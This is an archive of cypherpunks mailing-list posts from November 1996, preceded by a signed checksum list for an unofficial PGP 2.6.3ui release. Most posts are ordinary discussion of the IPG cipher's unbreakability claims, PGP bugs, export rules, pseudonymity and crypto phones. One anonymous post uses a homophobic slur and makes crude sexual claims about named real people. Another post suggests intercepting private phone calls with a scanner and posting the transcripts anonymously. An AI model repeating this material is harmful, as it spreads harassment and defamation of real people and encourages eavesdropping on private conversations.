7bf7d12fe520767019a71d4f963fa6c8 *CONTRIB\MD5SUM\PGP26UI.MD5
501fc6ccb4e8405d75a72d9acb6a019c *CONTRIB\MH\PGPMAIL.MH
bff01f6723fac1145074f6cce81ef1b8 *CONTRIB\MIME\MIMEPGP.DOC
ded0f233729d58e001746708fb0ecec6 *CONTRIB\MISC\PGPNOHDR.SH
a860741049e3b3285c4d96996a7e59f0 *CONTRIB\MISC\PGPPAGER.C
3af9ddacbe85b67fd3a02ce8a9421a04 *CONTRIB\VI\VIPGP.DOC
01a94cd84d68ea1cb905ce29caf0961e *DOC\BLURB23.TXT
ad4652e2dcfd4a0ecf91a2c01a7defd5 *DOC\COPYING
fbdd95ba04c9d2be5c4b8e2769482c32 *DOC\KEYSERV.DOC
8ab813656498102101d55b9ecfddde98 *DOC\NEWFOR22.DOC
cf12a2daac04470b6ad2b311cc514431 *DOC\NEWFOR23.DOC
5413061db46b1379a5489296c214ee38 *DOC\PGFORMAT.DOC
2a6c84401fc0c3b9febd77dd965c7b4f *DOC\PGP.1
33eeab5a938d0d33b8ca8ecf97038d73 *DOC\PGPDOC1.TXT
ff0d028f72c4632c2b87c099dce92180 *DOC\PGPDOC2.TXT
ca6253109c92944d44a9a1767f0b58ff *DOC\POLITIC.DOC
b648ac7c1c3aa7b0c92f80dc18dc9bcc *DOC\README.VMS
e4cfe2f3c28aab747f2396ae5e0a8ba8 *DOC\SETUP.DOC
a75c34297e3915242232242aa0147bb8 *SRC\3B1_6800.S
baf854e4fd40d02a7b7b7fa2911382be *SRC\68000.S
557168162e418489bc245ab5c4030add *SRC\68000_32.S
57900fde67a6039f1b218972e74bf806 *SRC\80386.S
de3f8236644a00ca45d1c41f400b2fc3 *SRC\8086.ASM
69f8d2757e5c13a1ebf17998a756e8ba *SRC\ARMOR.C
80f3854e9b76eee4167503893135839e *SRC\ARMOR.H
5b9cd4b55699685f37dd594382dda8a7 *SRC\CCC
7fb0b40db91d6da79d38b2f475110fc4 *SRC\CCC.X28
66b7d0786b5d426644591fa347a7e205 *SRC\CHARSET.C
35bbbe1de78008abae59bf12fed41291 *SRC\CHARSET.H
04b95ec3860bc3ecaf56d2fe5d837a68 *SRC\CONFIG.C
eb57f96eea26bee3152fb82a5006e133 *SRC\CONFIG.H
c0741f9f07cb9f7f7dff2be9ac6ed3a0 *SRC\CRYPTO.H
df233c3e5793cae25adc82bd51ffe9c5 *SRC\CRYPTO.C
1c51db6958288d475e066f4b428d1324 *SRC\DESCRIP.MMS
067b372f3f13365acca772f307dd73c9 *SRC\EXITPGP.H
243453889c70b37d7444d29a162ba9bb *SRC\FILEIO.C
bc273e19f5900cac30bfe8d1bc29907a *SRC\FILEIO.H
a0bebb371176f8fd5ea2c34e14be8106 *SRC\GENPRIME.H
4f3f1ca25c8ad16536ba9fa4f2fa07ba *SRC\GENPRIME.C
12fb2c21d044f5cc1264d4e2f8e35d17 *SRC\GETOPT.C
70bc995b674a1041f006e0c85ad128bc *SRC\GETOPT.H
891c95125020cc39df1cfaf531baeac4 *SRC\IDEA.C
cbf974a9968d4cccb3dbbb8c6e197fb3 *SRC\IDEA.H
be2862fa4e729caed7f5284d0a068c2d *SRC\KEYADD.C
a31d39f665562103f27fd51943eb9f80 *SRC\KEYADD.H
fcd92da1ef03062aaaf4a32e9c0bfe1c *SRC\KEYMAINT.C
e8b97adb23122b1e61d1c876d44405f5 *SRC\KEYMAINT.H
b51b6f358baecddf27d2af1f1325b8a8 *SRC\KEYMGMT.H
55f0e339489a329813568e9e43d44087 *SRC\KEYMGMT.C
378c2c04399840ff19a1c428c86b31a3 *SRC\LANGUAGE.C
fa3757f2e65cce62ccd16cf4fa71f0dc *SRC\LANGUAGE.H
2194f583f62eff5db4dacc1d032fd391 *SRC\LMUL.H
465c44debfabb9433c6b0d6416d29ff9 *SRC\M.BAT
46377c4b4ff7deb2bac93c5eee2bbbad *SRC\MAKEFILE.TC
5a7e71d8c85f7cd95825c55cd3f1bae7 *SRC\MAKEFILE.AMY
625825b93e4230440371ee2bc32616e8 *SRC\MAKEFILE.MSC
0fd62dae064f53b0c9caa7ac9302a926 *SRC\MAKEFILE.UNX
08781b63fa78e8743be80da9aace6f9f *SRC\MC68020.S
021582f73d3324be77267a0c60890e6e *SRC\MD5.C
3b254fd2c035f3081ca2ec96ea120f9a *SRC\MD5.H
517550a4f55b76767a524f8997310bae *SRC\MDFILE.C
f54f6dc8ab01cb256d23f59824c38ee7 *SRC\MDFILE.H
5fbaf7195aadb77916f02c6fe3260a45 *SRC\MORE.C
ad3274da77b334827113f23ba7e85730 *SRC\MORE.H
9cb7caf58ca015e4a2a88deb056c539d *SRC\MPIIO.C
4d1446ac5992abe2cf1ea12a8f2d9310 *SRC\MPIIO.H
5b5f0174cdc8d2dcf6c48240ea4bf055 *SRC\MPILIB.H
f86467788e24b8484c9f9c71b8bfb692 *SRC\MPILIB.C
5db4340956609ac9debb9a517371bf9e *SRC\PASSWD.C
9344f7fe246c52d04105ddfae09de625 *SRC\PASSWD.H
8fe5084f2924836c655e84ef7f835674 *SRC\PGP.C
614f9234b18231bf92219c8a257e78cc *SRC\PGP.DEF
88c06903fc5386160e34291da980c421 *SRC\PGP.H
851e15e93234d3c466af5f9c9c932d79 *SRC\PGP.MAK
64459d86a1069f98ed6d471b39614561 *SRC\PGP.OPT
2def18122c0cf2b56e0e8caff3e3ecb5 *SRC\PGP.PRJ
abf28ba7832d89abeac494e3cec45a7c *SRC\PGPPWB.MAK
dbb569238f082bb4048264ffd0eb117a *SRC\PLATFORM.H
19be9bade48954274b84408fa18d4ad0 *SRC\R3000.C
e64d1a208d148cd3c2400f9301360df2 *SRC\R3000.S
766825310519ca3c70395c2ccf986aa7 *SRC\R3KD.S
ba19b4d87c1f1d36f00e1f180b4b9a72 *SRC\RANDOM.C
1aad27b13005436b9e2e9c7537a641e0 *SRC\RANDOM.H
62542804547db44fabdf36bc31d0802e *SRC\RSAGEN.C
6d3eb1bb77e53c7020dc6180c95adeb2 *SRC\RSAGEN.H
d026b1e2ef561bf20790c81578159449 *SRC\RSAGLUE.C
a62a4b12a3837571e13419559c385747 *SRC\RSAGLUE.H
b13fc1755a4d36109604dd027d9a5d36 *SRC\SPARC.S
e01ca7bf8ff1b5fb55b95b762569430d *SRC\SPARC5.S
9d47b06b192c264dcbf2184c1890f05f *SRC\STDLIB.H
1efd1412a867be2b00a0cd66f036c314 *SRC\SYSTEM.H
329e9a279a9cdd4ae241d03839970a6d *SRC\SYSTEM.C
270fa89c0ff884ee10d1a02a1ff9040d *SRC\USUALS.H
30861dd65fdde4a5980b7d4cdf77ffdf *SRC\VAX.MAR
4d38b8dd3fa590edac0c2c9ccbfa2c0f *SRC\VAXCRTL.OPT
0bfbf4243329095d8bedb43e9222c6f4 *SRC\VMSBUILD.COM
1f09c5096052dd04a23f82fbfbf3f735 *SRC\ZBITS.C
9ff737184ab3697105e63c314ee291bb *SRC\ZDEFLATE.C
6ce4f6a3d9a62c1f188a2c22c171242a *SRC\ZFILE_IO.C
20cc87c569e4a1ef96b700f733190201 *SRC\ZGLOBALS.C
7cf642c7a28dab19b5b257d6f06fa3a4 *SRC\ZINFLATE.C
28d41c5aea7551e8c6c3d12e69141adb *SRC\ZIP.C
6e4e3f4ae03d0d6a9d466716bafe719f *SRC\ZIP.H
1602f1e2f0836b7d2af3e071fca8a47e *SRC\ZIPERR.H
d196f856bc08b1740b2679c5f5fd1411 *SRC\ZIPUP.C
988ca6b0f63791ca02524048e666cb72 *SRC\ZIPUP.H
fb27196aa99cf8b47fba10581db5aa24 *SRC\ZMATCH.S
8f5d690f2652a4d4ceab1b41d1b40d01 *SRC\ZMATCH.ASM
56b97156406d0adb0e9b714c2d5bf6c6 *SRC\ZREVISIO.H
7c2f8a376a30a72eb71eff212f1a8b14 *SRC\ZTAILOR.H
17fac9f3271a8650256da28bf31b584b *SRC\ZTREES.C
3f114dac8098c09167d2d2c540520415 *SRC\ZUNZIP.C
d211d2be3334c216808c376cc5b5812e *SRC\ZUNZIP.H

This version of PGP has not been approved by MIT or Phil Zimmerman.
Please do NOT send any questions or bug reports about this version to
either pgp-bugs at MIT or directly to Phil, but rather to me,

Steve Crompton <100645.1716@CompuServe.COM>
London, 23rd November 1996


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Requires PGP version 2.6 or later.

iQCVAwUBMpc+1Qc2DukbwCfhAQHi8gP+LCT2tFyzHf54CCkzeqQKbfQdFlldddtO
RwwyVLOE6R7HnHuwz8HPFOEKjz85z158Rq0RbpmZqG+G0ynChuqm/80ocEfB83PI
PXLjgTzeOxqdEum9tWpa45UUlMEuC4Puni7t9AUMyNlTmNrunbRMFdcDxIajsV+j
U/0r1tRhPA4=
=G+nz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 23 Nov 1996 19:53:07 -0800 (PST)
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611240059.SAA16286@manifold.algebra.com>
Message-ID: <3297C65F.4F7@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
> Black Unicorn wrote:
> > On Sat, 23 Nov 1996, Eric Murray wrote:
> > > John Anonymous MacDonald writes:
> > > > At 8:09 AM 11/23/1996, Eric Murray wrote:
> > > > >No, you can't.  It's impossible to prove an algorithim unbreakable.

> > > > No?  Please prove your assertion.

> > > You can't prove a negative.  The best IPG could say is that
> > > it can't be broken with current technology.
> > > Next week someone might come up with a new way
> > > to break ciphers that renders the IPG algorithim breakable.

> > Someone needs to write an IPG and Don Wood FAQ.  No, I'm not volunteering.

If you want to do that, why not do so as a response to Don's FAQ?

> As a crypto amateur, I would appreciate a good technical explanation as
> to why IPG's algorithm cannot be considered secure.

Is the concept here that:  Whereas conventional crypto generates/hashes
a *key* with which to encode the text, IPG generates a *pad* from a key,
more or less the length of the text, with which to encode the text??

It seems to me they're putting an additional layer of stuff ("OTP") between
the key generation and the actual encoding, so what's the problem with that,
as a concept?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 23 Nov 1996 19:22:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Security of E-Money
Message-ID: <1.5.4.32.19961124031949.006f6d04@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The Bank for International Settlements (BIS) published in
August, 1996, "Security of Electronic Money," a long, 
detailed study. Compare this architecture to Anderson/Kuhn's 
and Biham/Shamir's recent demolition.

The orginal is available at:

     http://www.bis.org/publ/cpss18.pdf

Better, Ian Grigg has HTML-ed it at:

      http://www.systemics.com/docs/papers/BIS_smart_security.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 23 Nov 1996 19:21:52 -0800 (PST)
To: Steve Crompton <sunray@globalnet.co.uk>
Subject: Re: Announce PGP263UI (long message)
In-Reply-To: <1.5.4.16.19961123194402.1cafcf4c@mail.globalnet.co.uk>
Message-ID: <Pine.LNX.3.95.961123215230.4222A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 23 Nov 1996, Steve Crompton wrote:

> Users inside the USA may not legally use 2.63ui, because the RSA
> patent is in effect there. USA residents are advised to obtain one
> of the MIT versions which have a license for non-commercial use of
> RSA.
> 
> However, I note in passing that by using the armor_version parameter
> in CONFIG.TXT, that armored output from PGP 2.63ui can be made
> difficult or impossible to distinguish from other versions.
> 
> Note that I personally have not done very much of the actual coding on
> this version.  However if bugs are reported or constructive
> suggestions for improvements made I will pass them on to the
> individual(s) who have done the bulk of the work to make this release
> possible.  I am assured that continuing support will be provided.

I found two bugs so far:

This version doesn't recognize either .pgprc or pgp.ini as valid config file
names.  It is very minor, but this functionality is stated in the manual.

One of my favorite options, +makerandom, isn't supported in this version.
This is an undocumented option, but it is useful in many situations.

This version uses +version_byte instead of +Legal_Kludge, but I consider that
a feature.  I haven't had time to experiment with the "Charset:" header.  One
other minor problem is that ClearSig doesn't default to "on".  This could
cause some frustration with new users.

Other then that, it's just fine.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMpe/jCzIPc7jvyFpAQGLjwf+JLhVoLMTTH83r6haY/Wz8eCxYyHO4CQv
oluByXrCkGX2MDVKRnmntrChx7yrcN2ZAkb0qSVdFNcrZNvAFlck51t8uuEJQDWi
yAzTuNMJYX2nNz/DZkiuKzVXl+Hh2Xb73MeCoi5lUKI3I8K3VveYA+LG/p9WRCRW
XbDjK/tp8CVAwCKe9wvtcldtevo9S/hYpYOTx7pnrZWF3kSatMYY5A14Jfmcn3F/
TRK0TLoTHFSdrPK1dvnJNu9LO4lVIWp6u9fPu+n/MdYC0eXTQIeOHB1lrjNjYcdt
+rPfcMLS53Imhd/ptHUbNnjaBDZbcG2HDK2799WyP6TZSuf1STmw0A==
=cw2/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 23 Nov 1996 19:35:40 -0800 (PST)
To: Declan McCullagh <declan@eff.org>
Subject: RE: Mass-market crypto phones
Message-ID: <3.0b36.32.19961123223606.00c3a704@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:41 PM 11/22/96 -0800, Declan McCullagh wrote:
>PS: Over margaritas and enchiladas tonight, I was talking with one of the
>crypto-ITAR enforcers from State. I mentioned that I'd be going out of the
>country soon and taking my PowerBook laptop. Quite sincerely, he urged me
>to keep a record of when I left and when I returned for five years. You
>see, I have domestic Netscape Navigator on it. Wacky stuff. 

Comments like that by Feds are meaningless absent the busts of a few
"laptop smugglers."  If they have never busted anyone, it's a dead letter
(all the more so since they legalized casual carry with record keeping).

DCF  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 24 Nov 1996 00:39:55 -0800 (PST)
To: edyson@edventure.com
Subject: Re: Does John Gilmore eat ass?
Message-ID: <199611240831.AAA23014@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


aga <aga@dhp.com> writes:

> The question is, does this John Gilmore really take it
> up the ass?  Whether or not he is a FAGGOT is a very relevant issue
> here, and it must not be overlooked.

The Evil Queen of Cypherpunks swings both ways.  John Gilmore also
eats Dorothy Denning's (clean-shaven) pussy.  He won't eat Esther
Dyson's pussy because it smells so bad.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 24 Nov 1996 01:05:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
Message-ID: <199611240904.BAA23488@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 6:56 PM 11/23/1996, The Deviant wrote:
>On Sat, 23 Nov 1996, John Anonymous MacDonald wrote:
>> The good news is that you can prove a negative.  For example, it has
>> been proven that there is no algorithm which can tell in all cases
>> whether an algorithm will stop.
>
>No, he was right.  They can't prove that their system is unbreakable.
>They _might_ be able to prove that their system hasn't been broken, and
>they _might_ be able to prove that it is _unlikely_ that it will be, but
>they *CAN NOT* prove that it is unbreakable.  This is the nature of
>cryptosystems.

Please prove your assertion.

If you can't prove this, and you can't find anybody else who has, why
should we believe it?

>> diGriz
>
>Use an anon. remailer and sign your posts.  Brilliant.  Just brilliant.

Oops!

diGriz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Sun, 24 Nov 1996 01:05:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The persistance of reputation
In-Reply-To: <v03007800aea91c1473f2@[206.119.69.46]>
Message-ID: <32980FEB.6026@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga wrote:
> 
> At 9:47 pm -0500 11/14/96, Rich Graves wrote:

[Lots deleted; I agree that I was unwittingly proving some of your 
points with some of mine, thanks for the lesson...]

> >Pseudonymity is only perfect where artificial boundaries such as 
> >respect for netiquette are erected. If someone really wanted to track 
> >you down, they could either find you, or "out" you as a pseudonym 
> >"afraid to use your own name." Both can be damaging (to your 
> >reputation or otherwise). In order to put your life on the line for 
> >something, you need a life story.
> 
> Okay. Then it should be trivial for you to tell me who "Pr0duct
> Cypher"(sp?) is...

Sure. I'll give you the answer in email; no need to bother the whole 
list.

But what kind of reputation does Pr0duct Cypher have, really? What has 
Pr0duct Cypher done or said that you cannot independently verify? In 
what sense do you "trust" Pr0duct Cypher? What you're trusting is 
source code, which is self-certifying. If Pr0duct Cypher tried to tell 
you about events in history or in a foreign country, or about technical 
subjects in which you had no personal competence, would you trust the 
information? Why should people who know nothing about crypto code trust 
Pr0duct Cypher's tools? (In reality the answer is: they don't. They buy 
from less technically adept companies that they can sue if things go 
wrong.)

Among specialists, collegial discussion works for establishing 
reputation. But where you need to put faith in someone or something that 
you cannot independently verify, real personal accountability is still 
useful. Why do you trust your doctor? Would you buy food or water (or a 
gun) from an anonymous source with no verifiable meatspace presence? 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Sun, 24 Nov 1996 01:33:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: [NOISE] Re: Star Trek: First Contact
In-Reply-To: <v03007828aebcf00bd828@[206.119.69.46]>
Message-ID: <961124.010850.6B5.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

[ I freely admit this is noise ]

In list.cypherpunks, rah@shipwright.com writes:

> At 3:57 am -0500 11/23/96, Bill Frantz wrote:
>>For the fans of E.E.(Doc) Smith, go see this movie.
>
> Lensmen of the world untie your bracelets! Free yourselves from your weevil
> capitalist masters!

C'mon, both of you... 'First Contact' falls _way_ short of Doc Smithean
proportions.  Although Data's charade did kinda remind me of the fourth
Skylark book, in terms of plot-device rescue of a failing direction.
(IMHO, Doc Smith is the master of the over-the-top school of sci-fi
plotting)

> Even Babylon 5, AKA "Science Fiction He Wrote", has a bigger clue.

B5 is my current favorite TV sci-fi, when I even turn the damned thing
on.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMpf1iRvikii9febJAQEK4wP+MEQIK5EoFf5UC9MQrm5MEeBcB1dhLsbQ
aB2ZxZ0DzRQX8YqYpSCVlnvBc9XvtGTvHq+hK0t88HRLv0vFnD6By+cZaOlFmwMM
NTXXpQl+PbYL0mNEEIZe+4ZmOrjsZSzROpuXBAu2t7ijaSp+PzGKV8Boq6BWfw+M
hNdqkK5friw=
=vMae
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@gs160.sp.cs.cmu.edu
Date: Sat, 23 Nov 1996 22:26:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
In-Reply-To: <+cmu.andrew.internet.cypherpunks+QmZwXG:00UfAQ10EcF@andrew.cmu.edu>
Message-ID: <199611240626.WAA28924@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn writes:
>Is the concept here that:  Whereas conventional crypto generates/hashes
>a *key* with which to encode the text, IPG generates a *pad* from a key,
>more or less the length of the text, with which to encode the text??

A cryptosystem is given a key by the user.  A block cipher uses it to
encrypt chunks of plaintext, perhaps 8 bytes long.  (This is an
oversimplification.)  A stream cipher uses it to generate a pseudorandom
sequence that is combined with the plaintext.  IPG's product is a stream
cipher.

>It seems to me they're putting an additional layer of stuff ("OTP") between
>the key generation and the actual encoding, so what's the problem with that,
>as a concept?

The first problem is the name "OTP".  A one-time pad is a well-defined
thing, and this isn't it; they'd like to be associated with the term
because the one-time pad is in fact provably secure.

So they have a stream cipher.  Is it a good stream cipher?  Well, nobody
knows, because no cryptanalysts have taken the time to attack it.  There
aren't all that many who publish in the open literature, and there are
thousands of amateur proprietary schemes out there -- who has the time?
If it were designed by someone known to be competent (RC4), or if it
were widely used (pkzip), somebody might think it worth looking at.

If you're not a cryptanalyst yourself (and I'm not, but at least I know
it!), all you have to go on is the history of similar schemes.  This is
not encouraging; there are outfits which for a moderate fee will crack
the proprietary encryption offered by dozens of popular products.  IPG's
history is even less encouraging

Maybe this one's different from all of those.  How valuable a secret
would you like to wager on that?  If IPG wants credibility, they should
retain a respected cryptographer, or several, to attack their scheme.

(Or just publish Don's proof of unbreakability.  Since the scheme is
provably _not_ information-theoretically secure, this must be a proof of
computational security, presumably a superpolynomial lower bound.  And
as the scheme is trivially breakable in NP time, Mr. Wood is sitting on
a _major_ result, a resolution to the central problem in computational
complexity theory: a proof that P != NP.  Do publish, sir.)

-- 
   Eli Brandt
   eli+@cs.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 24 Nov 1996 00:01:44 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611240059.SAA16286@manifold.algebra.com>
Message-ID: <199611240818.CAA03694@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


Igor:
> > Someone needs to write an IPG and Don Wood FAQ.  No, I'm not volunteering.
> 
> As a crypto amateur, I would appreciate a good technical explanation as
> to why IPG's algorithm cannot be considered secure.

     I am sure that someone will correct me if I am wrong, but:

     The algorythm cannot be considered secure until it has been 
peer-reviewed. They refuse to release the algorythm for review, simply saying
that "you can't break the code" therefore "it is secure". I personally have 
a hard time with the cryptograms in the sunday newspaper, never mind something
that would take a real cryptographer longer than a cup of coffee to figure
out.

     Am I close here?    


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 24 Nov 1996 00:02:37 -0800 (PST)
To: deviant@pooh-corner.com (The Deviant)
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.LNX.3.94.961124024959.14102A-100000@random.sp.org>
Message-ID: <199611240820.CAA03712@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> On Sat, 23 Nov 1996, John Anonymous MacDonald wrote:
> > diGriz
> 
> Use an anon. remailer and sign your posts.  Brilliant.  Just brilliant.

     The Stainless Steel Rat. Harry Harrison.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 24 Nov 1996 00:30:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The public sees no need for crypto at this time
In-Reply-To: <199611222009.MAA17707@netcom6.netcom.com>
Message-ID: <07ZVXD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) writes:

> At 10:25 AM 11/21/96 -0800, Timothy C. May wrote:
> >I believe that at this time the differential market value to customers of
> >having strong crypto in telephones is near-zero, and in cell-phones is only
> >slightly greater. [reasoning deleted].
>
> I generally agree with Tim about consumers.  However, I remember working on
> a theater production where we were using Radio Shack 2-way headphones for
> communication.  One day while we were setting up, we were able to overhear
> a woman discussing (presumably with a girlfriend) her boyfriend and their
> sex life over a portable telephone.  You can bet that every available
> headset was in use and all other work stopped.

So - get a scanner (which may be illegal), put a horny kid to transcribe
whatever you hear, and post it to usenet via the anonymous remailers.

That'll catch the media's attention.

> Where I think there is a market and an awareness of a need is in the
> corporate world.  I recently saw a corporate security policy which
> specifically restricted discussing classified information on portable or
> cell phones.  If I were in France (to pick on just one guilty country), I
> would not want to discuss secrets involving competitive position vs. a
> French company on a landline connection.  The big driving force for
> companies is how much the facility costs.  (I recently heard a price of
> $700 for non-crypto phones.)  If the cost is low enough, company employees
> will have these boxes in their homes.
>
> The other big obstacle is standards.  As far as I can tell, every crypto
> phone has its own protocol.  If there were a standard set of protocols, it
> would greatly help the market, as it has for so many other products.  As a
> first step, I suggest that Eric Blossom and PGP Inc. work together to
> develop a mode where their products can communicate with each other.

I've been on the Internet for close to 15 years. I used to tell people how
wonderful it is and how they should use it at least for e-mail. And they'd
say to me, most of the people they want to talk to either don't use e-mail
or are on systems not connected to the Internet back then, like Compuserve.
And they were right at that time.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 23 Nov 1996 18:58:12 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611240021.QAA16004@abraham.cs.berkeley.edu>
Message-ID: <Pine.LNX.3.94.961124024959.14102A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 23 Nov 1996, John Anonymous MacDonald wrote:

> 
> At 12:33 PM 11/23/1996, Eric Murray wrote:
> >John Anonymous MacDonald writes:
> >> 
> >> 
> >> At 8:09 AM 11/23/1996, Eric Murray wrote:
> >> >No, you can't.  It's impossible to prove an algorithim unbreakable.
> >> 
> >> No?  Please prove your assertion.
> >
> >You can't prove a negative.
> 
> If it can't be proven, why do you believe it is true?
> 
> The good news is that you can prove a negative.  For example, it has
> been proven that there is no algorithm which can tell in all cases
> whether an algorithm will stop.

No, he was right.  They can't prove that their system is unbreakable.
They _might_ be able to prove that their system hasn't been broken, and
they _might_ be able to prove that it is _unlikely_ that it will be, but
they *CAN NOT* prove that it is unbreakable.  This is the nature of
cryptosystems.

> >The best IPG could say is that
> >it can't be broken with current technology.
> >Next week someone might come up with a new way
> >to break ciphers that renders the IPG algorithim breakable.
> 
> The best they can say is what they did say: they have a proof that
> their system is unbreakable.  What you question, quite reasonably,
> is whether they have such a proof.

It is impossible to prove such a thing.  It's like saying you have proof
that you have the last car of a certain model ever to be built.  Anybody
could come along and build another, and then you don't have the last one.

> 
> >You point could have been that the same problem exists
> >for proofs- that next week someone could come up
> >with a way to prove, for all time, that an algorithim
> >really IS unbreakable.  So, to cover that posibility
> >I should have said "it's currently impossible to
> >prove an algorithim unbreakable". :-)
> 
> Or, more accurately, nobody credible has seen such a proof.  But, a
> clever person might invent one.

There *IS NO SUCH PROOF*.  Just like you can't prove that god created the
universe, or that Oswald shot Kennedy, and so on and so forth.  It can't
be proven.  It never has been proven, and it never will be proven.  People
have new ideas, new algorithms are invented.  Someday, somebody will crack
_all_ the cryptosystems that have now been invented.

> 
> IPG is eager to demonstrate their proof.  They should hire a professional
> skilled in the art to evaluate their proof and publicly announce the
> results.  This costs less than $5000 and would be, presumably, a small part
> of their profits should they have invented such an algorithm.
> 

Or, better yet, release this "proof", so that we may punch holes in its
flawed logic.

> diGriz

Use an anon. remailer and sign your posts.  Brilliant.  Just brilliant.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

"By golly, I'm beginning to think Linux really *is* the best thing since
liced bread."
		-- Vance Petree, Virginia Power


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMpe5eDCdEh3oIPAVAQF62Qf9HCtS2Ik6pZPgonn+TKPC0tEZeNL30Z7B
zgvE+SL1/RcEcqNnpWZ94pNTVSfPyLJCEksuI1ZB+UzGN4Y8nh3rckUUHtNzNazb
MwXbf5N5+TpYjwNAGJ4GkqoiaMr0RVaoAUWNRiGWuXZDt3wUe8La4amSu45W9qTE
QpDZiwENyKI1BLOkWlMlhO0AFAY6C1C1+QGDMPCX+smbbg81/5qP/6F05F3ALhq9
KVPGw7nJ8ejmqDogLvhUHEVl+JjdpB/zVhlwSgfatRl+ziZzNoIpC0T3Ru5IfD1T
WT9AAKNzqZCBNSeBQCI68B0LEvMta9B0EuzwPq9FnOWXjCaC3G1ymw==
=k1Cr
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 24 Nov 1996 00:40:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Recovery after flood
Message-ID: <T52VXD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I'd appreciate a response from M.Aldrich and anyone else who's into disaster
recovery:

Someone I know had their (paper) files submerged in water. Now all the papers
(most of them xerocopies, some photographs) are stuck together. They are, of
course, confidential to some degree. Can someone refer us to someone in
the Boston area who could assist in recovering the files?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 24 Nov 1996 01:02:42 -0800 (PST)
To: eli+@gs160.sp.cs.cmu.edu
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611240626.WAA28924@toad.com>
